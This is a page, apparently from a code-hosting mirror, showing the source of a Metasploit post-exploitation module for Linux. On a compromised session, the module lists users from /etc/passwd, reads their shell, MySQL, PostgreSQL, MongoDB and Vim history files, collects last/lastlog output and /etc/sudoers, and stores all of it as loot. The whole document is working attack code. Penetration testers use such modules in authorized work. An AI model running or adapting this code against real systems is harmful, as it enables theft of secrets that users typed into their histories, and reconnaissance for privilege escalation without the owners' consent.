Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/linux/gather/enum_users_history.rb
Views: 11704
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Linux::System89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Linux Gather User History',14'Description' => %q{15This module gathers the following user-specific information:16shell history, MySQL history, PostgreSQL history, MongoDB history,17Vim history, lastlog, and sudoers.18},19'License' => MSF_LICENSE,20'Author' => [21# based largely on get_bash_history function by Stephen Haywood22'ohdae <bindshell[at]live.com>'23],24'Platform' => ['linux'],25'SessionTypes' => ['shell', 'meterpreter']26)27)28end2930def run31distro = get_sysinfo3233print_good('Info:')34print_good("\t#{distro[:version]}")35print_good("\t#{distro[:kernel]}")3637user = execute('/usr/bin/whoami')38users = execute('/bin/cat /etc/passwd | cut -d : -f 1').chomp.split39users = [user] if user != 'root' || users.blank?4041vprint_status("Retrieving history for #{users.length} users")42shells = %w[ash bash csh ksh sh tcsh zsh]43users.each do |u|44home = get_home_dir(u)45shells.each do |shell|46get_shell_history(u, home, shell)47end48get_mysql_history(u, home)49get_psql_history(u, home)50get_mongodb_history(u, home)51get_vim_history(u, home)52end5354last = execute('/usr/bin/last && /usr/bin/lastlog')55sudoers = cat_file('/etc/sudoers')56save('Last logs', last) unless last.blank?57save('Sudoers', sudoers) unless sudoers.blank? || sudoers =~ /Permission denied/58end5960def save(msg, data, ctype = 'text/plain')61ltype = 'linux.enum.users'62loot = store_loot(ltype, ctype, session, data, nil, msg)63print_good("#{msg} stored in #{loot}")64end6566def execute(cmd)67vprint_status("Execute: #{cmd}")68output = cmd_exec(cmd)69output70end7172def cat_file(filename)73vprint_status("Download: #{filename}")74output = read_file(filename)75output76end7778def get_home_dir(user)79home = execute("echo ~#{user}")80if home.empty?81if user == 'root'82home = '/root'83else84home = "/home/#{user}"85end86end87home88end8990def get_shell_history(user, home, shell)91vprint_status("Extracting #{shell} history for #{user}")92hist = cat_file("#{home}/.#{shell}_history")93save("#{shell} history for #{user}", hist) unless hist.blank? || hist =~ /No such file or directory/94end9596def get_mysql_history(user, home)97vprint_status("Extracting MySQL history for #{user}")98sql_hist = cat_file("#{home}/.mysql_history")99save("MySQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/100end101102def get_psql_history(user, home)103vprint_status("Extracting PostgreSQL history for #{user}")104sql_hist = cat_file("#{home}/.psql_history")105save("PostgreSQL history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/106end107108def get_mongodb_history(user, home)109vprint_status("Extracting MongoDB history for #{user}")110sql_hist = cat_file("#{home}/.dbshell")111save("MongoDB history for #{user}", sql_hist) unless sql_hist.blank? || sql_hist =~ /No such file or directory/112end113114def get_vim_history(user, home)115vprint_status("Extracting Vim history for #{user}")116vim_hist = cat_file("#{home}/.viminfo")117save("Vim history for #{user}", vim_hist) unless vim_hist.blank? || vim_hist =~ /No such file or directory/118end119end120121122